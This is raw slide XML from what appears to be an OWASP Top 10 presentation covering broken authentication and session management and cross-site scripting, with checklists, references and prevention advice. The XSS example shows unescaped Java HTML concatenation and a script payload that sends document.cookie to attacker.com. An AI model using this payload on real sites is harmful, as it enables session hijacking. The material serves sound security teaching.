              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are session management assets like user credentials and session IDs properly protected? You may be vulnerable if:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ser authentication credentials aren’t protected when stored using hashing or encryption. See A6.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).</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 exposed in the URL (e.g., URL rewriting).</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 vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>session fixation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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don’t timeout, or user sessions or authentication tokens, particularly single sign-on  (SSO) tokens, aren’t properly invalidated during logout.</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aren’t rotated after successful login.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asswords, session IDs, and other credentials are sent over unencrypted connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> See A6.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>See the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ASVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> requirement areas V2 and V3 for more details.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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For a more complete set of requirements and problems to avoid in this area, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ASVS requirements areas for Authentication (V2) and Session Management (V3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a: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7"/>
              </a:rPr>
              <a:t>OWASP Authentication Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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8"/>
              </a:rPr>
              <a:t>OWASP Forgot Password Cheat Sheet</a:t>
            </a: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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP Session Management Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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8"/>
              </a:rPr>
              <a:t>OWASP Development Guide: Chapter on Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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10"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Chapter on Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId11"/>
            </a:endParaRP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12"/>
              </a:rPr>
              <a:t>CWE Entry 287 on Improper Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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13"/>
              </a:rPr>
              <a:t>CWE Entry 384 on Session Fixation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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How Do I Prevent This?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The primary recommendation for an organization is to make available to developers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A single set of strong authentication and session management controls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Such controls should strive to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meet all the authentication and session management requirements defined in OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (ASVS) areas V2 (Authentication) and V3 (Session Management).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>have a simple interface for developers. Consider the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>ESAPI Authenticator and User APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as good examples to emulate, use, or build upon.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs. See A3.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 3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A2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Broken Authentication and Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Group 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32"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34" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>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44"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5"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6"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7"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36"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8"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9" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="32" idx="3"/>
                <a:endCxn id="36"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41"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42" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="36" idx="4"/>
                <a:endCxn id="41"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0"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1" name="Rectangle 30"/>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174679496"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="956447"/>
          <a:ext cx="6858000" cy="253689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98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94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2104">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send untrusted </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>data to the system,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> including external users, internal users, and administrators.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 sends text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.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hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>data in</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> a page sent to the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>browser without properly validating or escaping</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>that content. There are three known types </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>of XSS flaws: 1) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Stored</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, 2) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Reflected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, and 3) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>DOM based XSS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Detection of most XSS flaws is fairly easy via testing or code analysis.</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execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>hijack the user’s browser using malware, etc</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system and all the data it processes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untrusted data in the construction of the following HTML snippet without validation or escaping:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (String) page += "&lt;input name='creditcard' type='TEXT‘</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" + request.getParameter("CC") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The attacker modifies the ‘CC’ parameter in his browser to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;script&gt;document.location=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  foo=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note that attackers can also use XSS to defeat any  automated CSRF defense the application might employ. See A8 for info on CSRF.</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XSS?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You are vulnerable if you do not ensure that all user supplied input is properly escaped, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>you do not verify it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to be safe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
